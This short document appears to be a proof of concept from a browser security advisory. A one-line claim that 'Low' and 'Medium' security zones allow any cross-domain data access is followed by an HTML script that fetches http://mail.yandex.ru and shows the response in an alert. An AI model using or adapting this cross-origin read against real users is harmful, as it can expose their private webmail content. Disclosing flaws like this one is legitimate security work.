Domains in a security zone with level "Low" or "Medium" have access to any cross-domain data...

<html>
<script>
function aa(url) {
    var client = new XMLHttpRequest();
    client.open("GET", url, true);
    client.send();
    client.onreadystatechange = function() {
        if (this.readyState == 2) alert(client.responseText);
    }
}
aa("http://mail.yandex.ru");
</script>
</html>